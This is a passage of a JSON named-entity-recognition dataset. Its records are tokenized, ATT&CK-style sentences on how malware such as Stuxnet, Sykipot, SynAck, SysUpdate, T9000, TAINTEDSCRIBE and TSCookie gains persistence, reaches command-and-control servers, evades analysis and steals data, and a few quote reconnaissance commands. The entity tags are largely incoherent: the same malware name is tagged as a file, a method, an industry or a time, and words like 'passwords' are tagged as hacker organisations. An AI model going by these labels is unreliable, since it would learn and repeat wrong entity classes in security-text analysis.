"impersonate", "an", "anonymous", "token", "to", "enumerate", "bindings", "in", "the", "service", "control", "manager." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Stuxnet", "uses", "HTTP", "to", "communicate", "with", "a", "command", "and", "control", "server." ], "ner_tags": [ "B-SamFile", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Stuxnet", "used", "WMI", "with", "an", "<code>explorer.exe</code>", "token", "to", "execute", "on", "a", "remote", "share." ], "ner_tags": [ "B-SamFile", "O", "B-Way", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Stuxnet", "uses", "a", "driver", "registered", "as", "a", "boot", "start", "service", "as", "the", "main", "load-point." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Sykipot", "uses", "SSL", "for", "encrypting", "C2", "communications." ], "ner_tags": [ "B-Idus", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Sykipot", "may", "use", "<code>net", "group", "\"domain", "admins\"", "/domain</code>", "to", "display", "accounts", "in", "the", "\"domain", "admins\"", "permissions", "group", "and", "<code>net", "localgroup", "\"administrators\"</code>", "to", "list", "local", "system", "administrator", "group", "membership." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Sykipot", "injects", "itself", "into", "running", "instances", "of", "outlook.exe,", "iexplore.exe,", "or", "firefox.exe." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "B-SamFile", "B-SamFile", "O", "B-SamFile" ] }, { "tokens": [ "Sykipot", "contains", "keylogging", "functionality", "to", "steal", "passwords." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "B-HackOrg" ] }, { "tokens": [ "Sykipot", "is", "known", "to", "contain", "functionality", "that", "enables", "targeting", "of", "smart", "card", "technologies", "to", "proxy", "authentication", "for", "connections", "to", "restricted", "network", "resources", "using", "detected", "hardware", "tokens." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Idus", "O", "O", "O", "B-Features", "B-Purp", "O", "I-Purp", "I-Purp", "I-Purp", "I-Purp", "I-Purp", "O", "O", "O", "O" ] }, { "tokens": [ "Sykipot", "may", "gather", "a", "list", "of", "running", "processes", "by", "running", "<code>tasklist", "/v</code>." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Sykipot", "has", "been", "known", "to", "establish", "persistence", "by", "adding", "programs", "to", "the", "Run", "Registry", "key." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "I-Way", "I-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Sykipot", "may", "use", "<code>net", "view", "/domain</code>", "to", "display", "hostnames", "of", "available", "systems", "on", "a", "network." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Sykipot", "may", "use", "<code>ipconfig", "/all</code>", "to", "gather", "system", "network", "configuration", "details." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "I-Features", "I-Features", "I-Features", "I-Features", "O" ] }, { "tokens": [ "Sykipot", "may", "use", "<code>netstat", "-ano</code>", "to", "display", "active", "network", "connections." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Sykipot", "may", "use", "<code>net", "start</code>", "to", "display", "running", "services." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SynAck", "clears", "event", "logs." ], "ner_tags": [ "B-Way", "O", "O", "O" ] }, { "tokens": [ "SynAck", "encrypts", "the", "victims", "machine", "followed", "by", "asking", "the", "victim", "to", "pay", "a", "ransom." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SynAck", "checks", "its", "directory", "location", "in", "an", "attempt", "to", "avoid", "launching", "in", "a", "sandbox." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SynAck", "can", "manipulate", "Registry", "keys." ], "ner_tags": [ "B-Way", "O", "I-Features", "B-HackOrg", "B-Features" ] }, { "tokens": [ "SynAck", "parses", "the", "export", "tables", "of", "system", "DLLs", "to", "locate", "and", "call", "various", "Windows", "API", "functions." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Features", "I-Features", "O" ] }, { "tokens": [ "SynAck", "payloads", "are", "obfuscated", "prior", "to", "compilation", "to", "inhibit", "analysis", "and/or", "reverse", "engineering." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SynAck", "enumerates", "all", "running", "processes." ], "ner_tags": [ "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "SynAck", "abuses", "NTFS", "transactions", "to", "launch", "and", "conceal", "malicious", "processes." ], "ner_tags": [ "B-Way", "I-Way", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SynAck", "enumerates", "Registry", "keys", "associated", "with", "event", "logs." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SynAck", "checks", "its", "directory", "location", "in", "an", "attempt", "to", "avoid", "launching", "in", "a", "sandbox." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SynAck", "gathers", "computer", "names,", "OS", "version", "info,", "and", "also", "checks", "installed", "keyboard", "layouts", "to", "estimate", "if", "it", "has", "been", "launched", "from", "a", "certain", "list", "of", "countries." ], "ner_tags": [ "B-Time", "B-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SynAck", "lists", "all", "the", "keyboard", "layouts", "installed", "on", "the", "victim’s", "system", "using", "<code>GetKeyboardLayoutList</code>", "API", "and", "checks", "against", "a", "hardcoded", "language", "code", "list.", "If", "a", "match", "if", "found,", "SynAck", "sleeps", "for", "300", "seconds", "and", "then", "exits", "without", "encrypting", "files." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SynAck", "gathers", "user", "names", "from", "infected", "hosts." ], "ner_tags": [ "B-Way", "B-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "SynAck", "enumerates", "all", "running", "services." ], "ner_tags": [ "B-Time", "O", "O", "O", "B-Idus" ] }, { "tokens": [ "Sys10", "collects", "the", "group", "name", "of", "the", "logged-in", "user", "and", "sends", "it", "to", "the", "C2." ], "ner_tags": [ "B-Idus", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Sys10", "uses", "an", "XOR", "0x1", "loop", "to", "encrypt", "its", "C2", "domain." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "B-Tool", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Sys10", "collects", "the", "computer", "name,", "OS", "versioning", "information,", "and", "OS", "install", "date", "and", "sends", "the", "information", "to", "the", "C2." ], "ner_tags": [ "B-Idus", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Sys10", "collects", "the", "local", "IP", "address", "of", "the", "victim", "and", "sends", "it", "to", "the", "C2." ], "ner_tags": [ "B-SamFile", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Sys10", "collects", "the", "account", "name", "of", "the", "logged-in", "user", "and", "sends", "it", "to", "the", "C2." ], "ner_tags": [ "B-Idus", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Sys10", "uses", "HTTP", "for", "C2." ], "ner_tags": [ "B-Idus", "O", "B-Way", "O", "O" ] }, { "tokens": [ "SysUpdate", "has", "been", "signed", "with", "stolen", "digital", "certificates." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SysUpdate", "can", "load", "DLLs", "through", "vulnerable", "legitimate", "executables." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SysUpdate", "has", "used", "DNS", "TXT", "requests", "as", "for", "its", "C2", "communication." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SysUpdate", "can", "collect", "information", "and", "files", "from", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SysUpdate", "can", "deobfuscate", "packed", "binaries", "in", "memory." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SysUpdate", "can", "encrypt", "and", "encode", "its", "configuration", "file." ], "ner_tags": [ "B-Way", "O", "O", "O", "B-Features", "O", "I-Features", "O" ] }, { "tokens": [ "SysUpdate", "has", "exfiltrated", "data", "over", "its", "C2", "channel." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SysUpdate", "can", "delete", "its", "configuration", "file", "from", "the", "targeted", "system." ], "ner_tags": [ "B-Way", "O", "B-Features", "O", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "SysUpdate", "can", "search", "files", "on", "a", "compromised", "host." ], "ner_tags": [ "B-Way", "O", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "SysUpdate", "can", "store", "its", "encoded", "configuration", "file", "within", "<code>Software\\Classes\\scConfig</code>", "in", "either", "<code>HKEY_LOCAL_MACHINE</code>", "or", "<code>HKEY_CURRENT_USER</code>." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "B-SamFile" ] }, { "tokens": [ "SysUpdate", "has", "the", "ability", "to", "set", "file", "attributes", "to", "hidden." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "I-Features", "O", "O" ] }, { "tokens": [ "SysUpdate", "has", "the", "ability", "to", "download", "files", "to", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "SysUpdate", "can", "contact", "the", "DNS", "server", "operated", "by", "Google", "as", "part", "of", "its", "C2", "establishment", "process." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "B-Org", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SysUpdate", "has", "named", "their", "unit", "configuration", "file", "similarly", "to", "other", "unit", "files", "residing", "in", "the", "same", "directory,", "`/usr/lib/systemd/system/`,", "to", "appear", "benign." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O" ] }, { "tokens": [ "SysUpdate", "can", "write", "its", "configuration", "file", "to", "<code>Software\\Classes\\scConfig</code>", "in", "either", "<code>HKEY_LOCAL_MACHINE</code>", "or", "<code>HKEY_CURRENT_USER</code>." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "B-SamFile" ] }, { "tokens": [ "SysUpdate", "can", "call", "the", "`GetNetworkParams`", "API", "as", "part", "of", "its", "C2", "establishment", "process." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SysUpdate", "can", "collect", "information", "about", "running", "processes." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "SysUpdate", "can", "use", "a", "Registry", "Run", "key", "to", "establish", "persistence." ], "ner_tags": [ "B-Way", "O", "O", "O", "B-Tool", "O", "B-Tool", "O", "O", "O" ] }, { "tokens": [ "SysUpdate", "has", "the", "ability", "to", "capture", "screenshots." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "B-HackOrg" ] }, { "tokens": [ "SysUpdate", "can", "manage", "services", "and", "processes." ], "ner_tags": [ "B-Way", "O", "I-Features", "I-Features", "O", "O" ] }, { "tokens": [ "SysUpdate", "has", "been", "packed", "with", "VMProtect." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "B-Features" ] }, { "tokens": [ "SysUpdate", "has", "used", "Base64", "to", "encode", "its", "C2", "traffic." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SysUpdate", "has", "used", "DES", "to", "encrypt", "all", "C2", "communications." ], "ner_tags": [ "B-Time", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SysUpdate", "can", "collect", "a", "system's", "architecture,", "operating", "system", "version,", "hostname,", "and", "drive", "information." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SysUpdate", "can", "collected", "the", "IP", "address", "and", "domain", "name", "of", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SysUpdate", "can", "collect", "the", "username", "from", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SysUpdate", "can", "collect", "a", "list", "of", "services", "on", "a", "victim", "machine." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "SysUpdate", "can", "copy", "a", "script", "to", "the", "user", "owned", "`/usr/lib/systemd/system/`", "directory", "with", "a", "symlink", "mapped", "to", "a", "`root`", "owned", "directory,", "`/etc/ystem/system`,", "in", "the", "unit", "configuration", "file's", "`ExecStart`", "directive", "to", "establish", "persistence", "and", "elevate", "privileges." ], "ner_tags": [ "B-Idus", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SysUpdate", "can", "use", "WMI", "for", "execution", "on", "a", "compromised", "host." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SysUpdate", "can", "create", "a", "service", "to", "establish", "persistence." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Systeminfo", "can", "be", "used", "to", "gather", "information", "about", "the", "operating", "system." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "If", "a", "victim", "meets", "certain", "criteria,", "T9000", "uses", "the", "AppInit_DLL", "functionality", "to", "achieve", "persistence", "by", "ensuring", "that", "every", "user", "mode", "process", "that", "is", "spawned", "will", "load", "its", "malicious", "DLL,", "ResN32.dll.", "It", "does", "this", "by", "creating", "the", "following", "Registry", "keys:", "<code>HKLM\\Software\\Microsoft\\Windows", "NT\\CurrentVersion\\Windows\\AppInit_DLLs", "–", "%APPDATA%\\Intel\\ResN32.dll</code>", "and", "<code>HKLM\\Software\\Microsoft\\Windows", "NT\\CurrentVersion\\Windows\\LoadAppInit_DLLs", "–", "0x1</code>." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "T9000", "encrypts", "collected", "data", "using", "a", "single", "byte", "XOR", "key." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "T9000", "uses", "the", "Skype", "API", "to", "record", "audio", "and", "video", "calls.", "It", "writes", "encrypted", "data", "to", "<code>%APPDATA%\\Intel\\Skype</code>." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "T9000", "searches", "removable", "storage", "devices", "for", "files", "with", "a", "pre-defined", "list", "of", "file", "extensions", "(e.g.", "*", ".doc,", "*.ppt,", "*.xls,", "*.docx,", "*.pptx,", "*.xlsx).", "Any", "matching", "files", "are", "encrypted", "and", "written", "to", "a", "local", "user", "directory." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "the", "T9000", "installation", "process,", "it", "drops", "a", "copy", "of", "the", "legitimate", "Microsoft", "binary", "igfxtray.exe.", "The", "executable", "contains", "a", "side-loading", "weakness", "which", "is", "used", "to", "load", "a", "portion", "of", "the", "malware." ], "ner_tags": [ "O", "O", "B-Idus", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O" ] }, { "tokens": [ "T9000", "searches", "through", "connected", "drives", "for", "removable", "storage", "devices." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "T9000", "can", "take", "screenshots", "of", "the", "desktop", "and", "target", "application", "windows,", "saving", "them", "to", "user", "directories", "as", "one", "byte", "XOR", "encrypted", ".dat", "files." ], "ner_tags": [ "B-Idus", "O", "I-Features", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "T9000", "performs", "checks", "for", "various", "antivirus", "and", "security", "products", "during", "installation." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "T9000", "gathers", "and", "beacons", "the", "operating", "system", "build", "number", "and", "CPU", "Architecture", "(32-bit/64-bit)", "during", "installation." ], "ner_tags": [ "B-Idus", "B-Features", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "T9000", "gathers", "and", "beacons", "the", "MAC", "and", "IP", "addresses", "during", "installation." ], "ner_tags": [ "B-Idus", "B-Features", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "T9000", "gathers", "and", "beacons", "the", "username", "of", "the", "logged", "in", "account", "during", "installation.", "It", "will", "also", "gather", "the", "username", "of", "running", "processes", "to", "determine", "if", "it", "is", "running", "as", "SYSTEM." ], "ner_tags": [ "B-Idus", "B-Features", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "T9000", "gathers", "and", "beacons", "the", "system", "time", "during", "installation." ], "ner_tags": [ "B-Idus", "B-Features", "I-Features", "B-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "T9000", "uses", "the", "Skype", "API", "to", "record", "audio", "and", "video", "calls.", "It", "writes", "encrypted", "data", "to", "<code>%APPDATA%\\Intel\\Skype</code>." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TAINTEDSCRIBE", "has", "used", "<code>FileReadZipSend</code>", "to", "compress", "a", "file", "and", "send", "to", "C2." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TAINTEDSCRIBE", "can", "execute", "<code>FileRecvWriteRand</code>", "to", "append", "random", "bytes", "to", "the", "end", "of", "a", "file", "received", "from", "C2." ], "ner_tags": [ "B-Way", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TAINTEDSCRIBE", "can", "randomly", "pick", "one", "of", "five", "hard-coded", "IP", "addresses", "for", "C2", "communication;", "if", "one", "of", "the", "IP", "fails,", "it", "will", "wait", "60", "seconds", "and", "then", "try", "another", "IP", "address." ], "ner_tags": [ "B-Way", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TAINTEDSCRIBE", "can", "delete", "files", "from", "a", "compromised", "host." ], "ner_tags": [ "B-Way", "O", "B-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "TAINTEDSCRIBE", "can", "use", "<code>DirectoryList</code>", "to", "enumerate", "files", "in", "a", "specified", "directory." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O" ] }, { "tokens": [ "TAINTEDSCRIBE", "can", "download", "additional", "modules", "from", "its", "C2", "server." ], "ner_tags": [ "B-Way", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "The", "TAINTEDSCRIBE", "main", "executable", "has", "disguised", "itself", "as", "Microsoft’s", "Narrator." ], "ner_tags": [ "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "B-HackOrg" ] }, { "tokens": [ "TAINTEDSCRIBE", "can", "execute", "<code>ProcessList</code>", "for", "process", "discovery." ], "ner_tags": [ "B-Way", "O", "B-Features", "O", "O", "O", "O" ] }, { "tokens": [ "TAINTEDSCRIBE", "has", "used", "FakeTLS", "for", "session", "authentication." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "TAINTEDSCRIBE", "can", "copy", "itself", "into", "the", "current", "user’s", "Startup", "folder", "as", "“Narrator.exe”", "for", "persistence." ], "ner_tags": [ "B-Way", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O" ] }, { "tokens": [ "The", "TAINTEDSCRIBE", "command", "and", "execution", "module", "can", "perform", "target", "system", "enumeration." ], "ner_tags": [ "O", "B-Way", "B-Tool", "O", "I-Tool", "I-Tool", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TAINTEDSCRIBE", "uses", "a", "Linear", "Feedback", "Shift", "Register", "(LFSR)", "algorithm", "for", "network", "encryption." ], "ner_tags": [ "B-Idus", "O", "O", "B-Tool", "O", "B-Tool", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TAINTEDSCRIBE", "can", "use", "<code>DriveList</code>", "to", "retrieve", "drive", "information." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TAINTEDSCRIBE", "can", "execute", "<code>GetLocalTime</code>", "for", "time", "discovery." ], "ner_tags": [ "B-Way", "O", "B-Features", "O", "O", "O", "O" ] }, { "tokens": [ "TAINTEDSCRIBE", "can", "change", "the", "timestamp", "of", "specified", "filenames." ], "ner_tags": [ "B-Way", "O", "I-Features", "I-Features", "B-HackOrg", "O", "O", "O" ] }, { "tokens": [ "TAINTEDSCRIBE", "can", "enable", "Windows", "CLI", "access", "and", "execute", "files." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "I-Features", "O" ] }, { "tokens": [ "TDTESS", "creates", "then", "deletes", "log", "files", "during", "installation", "of", "itself", "as", "a", "service." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TDTESS", "has", "a", "command", "to", "download", "and", "execute", "an", "additional", "file." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "After", "creating", "a", "new", "service", "for", "persistence,", "TDTESS", "sets", "the", "file", "creation", "time", "for", "the", "service", "to", "the", "creation", "time", "of", "the", "victim's", "legitimate", "svchost.exe", "file." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "TDTESS", "provides", "a", "reverse", "shell", "on", "the", "victim." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "If", "running", "as", "administrator,", "TDTESS", "installs", "itself", "as", "a", "new", "service", "named", "bmwappushservice", "to", "establish", "persistence." ], "ner_tags": [ "O", "O", "O", "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "TEARDROP", "was", "decoded", "using", "a", "custom", "rolling", "XOR", "algorithm", "to", "execute", "a", "customized", "Cobalt", "Strike", "payload." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "I-Tool", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O" ] }, { "tokens": [ "TEARDROP", "files", "had", "names", "that", "resembled", "legitimate", "Window", "file", "and", "directory", "names." ], "ner_tags": [ "B-SamFile", "I-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TEARDROP", "modified", "the", "Registry", "to", "create", "a", "Windows", "service", "for", "itself", "on", "a", "compromised", "host." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TEARDROP", "created", "and", "read", "from", "a", "file", "with", "a", "fake", "JPG", "header,", "and", "its", "payload", "was", "encrypted", "with", "a", "simple", "rotating", "XOR", "cipher." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TEARDROP", "checked", "that", "<code>HKU\\SOFTWARE\\Microsoft\\CTF</code>", "existed", "before", "decoding", "its", "embedded", "payload." ], "ner_tags": [ "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TEARDROP", "ran", "as", "a", "Windows", "service", "from", "the", "<code>c:\\windows\\syswow64</code>", "folder." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TEXTMATE", "uses", "DNS", "TXT", "records", "for", "C2." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "TEXTMATE", "executes", "cmd.exe", "to", "provide", "a", "reverse", "shell", "to", "adversaries." ], "ner_tags": [ "B-Idus", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "When", "a", "document", "is", "found", "matching", "one", "of", "the", "extensions", "in", "the", "configuration,", "TINYTYPHON", "uploads", "it", "to", "the", "C2", "server." ], "ner_tags": [ "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TINYTYPHON", "has", "used", "XOR", "with", "0x90", "to", "obfuscate", "its", "configuration", "file." ], "ner_tags": [ "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TINYTYPHON", "searches", "through", "the", "drive", "containing", "the", "OS,", "then", "all", "drive", "letters", "C", "through", "to", "Z,", "for", "documents", "matching", "certain", "extensions." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Tool", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TINYTYPHON", "installs", "itself", "under", "Registry", "Run", "key", "to", "establish", "persistence." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TSCookie", "has", "the", "ability", "to", "steal", "saved", "passwords", "from", "the", "Internet", "Explorer,", "Edge,", "Firefox,", "and", "Chrome", "browsers." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "B-HackOrg", "O", "O", "O", "O", "B-Tool", "B-Way", "O", "B-Way", "O" ] }, { "tokens": [ "TSCookie", "has", "the", "ability", "to", "decrypt,", "load,", "and", "execute", "a", "DLL", "and", "its", "resources." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-Features", "B-Features", "O", "B-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TSCookie", "has", "the", "ability", "to", "discover", "drive", "information", "on", "the", "infected", "host." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ 